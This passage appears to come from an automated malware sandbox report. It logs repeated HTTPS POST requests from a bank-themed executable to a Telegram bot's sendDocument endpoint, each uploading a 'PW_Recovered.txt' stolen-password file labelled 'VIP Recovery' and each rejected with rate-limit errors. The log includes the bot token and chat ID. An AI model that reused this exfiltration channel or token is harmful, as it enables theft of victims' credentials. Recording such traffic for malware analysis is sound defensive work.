2024-11-25 10:43:12 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 63 36 38 61 39 33 38 35 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd0fc68a93853dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:13 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:13 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 36 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:13 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 36 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 36","parameters":{"retry_after":36}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49794	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:14 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0ff6921c8f43 Host: api.telegram.org Content-Length: 580
2024-11-25 10:43:14 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 66 66 36 39 32 31 63 38 66 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd0ff6921c8f43Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:15 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:15 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 34 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:15 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 34","parameters":{"retry_after":34}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49800	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:16 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1022a107cabd Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:16 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 32 61 31 30 37 63 61 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd1022a107cabdContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:17 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:17 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 32 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:17 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 32 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 32","parameters":{"retry_after":32}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49806	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:19 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd104fc51b5f72 Host: api.telegram.org Content-Length: 580
2024-11-25 10:43:19 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 34 66 63 35 31 62 35 66 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd104fc51b5f72Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:19 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:19 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 30 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:19 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 30","parameters":{"retry_after":30}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49812	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:21 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd108a77d22bf7 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:21 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 38 61 37 37 64 32 32 62 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd108a77d22bf7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:21 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:21 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 28 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:21 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 38 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 38 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 28","parameters":{"retry_after":28}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49818	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:23 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd10bd7861d1e0 Host: api.telegram.org Content-Length: 580
2024-11-25 10:43:23 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 62 64 37 38 36 31 64 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd10bd7861d1e0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:23 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:23 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 26 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:23 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 36 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 36 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 26","parameters":{"retry_after":26}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49820	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:25 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd10fdebe870d2 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:25 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 66 64 65 62 65 38 37 30 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd10fdebe870d2Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:25 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:25 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 24 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:25 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 34 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 34 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 24","parameters":{"retry_after":24}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49827	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:27 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd114312a04c68 Host: api.telegram.org Content-Length: 580
2024-11-25 10:43:27 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 34 33 31 32 61 30 34 63 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd114312a04c68Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:27 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:27 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 22 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:27 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 32 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 22","parameters":{"retry_after":22}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49831	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:29 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd119cdcf32fee Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:43:29 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 31 39 63 64 63 66 33 32 66 65 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd119cdcf32feeContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:43:29 UTC	370	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:43:29 GMT Content-Type: application/json Content-Length: 111 Connection: close Retry-After: 20 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:43:29 UTC	111	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 32 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 32 30 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 20","parameters":{"retry_after":20}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49837	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:43:31 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd11f54a4d3e32 Host: api.telegram.org Content-Length: 580
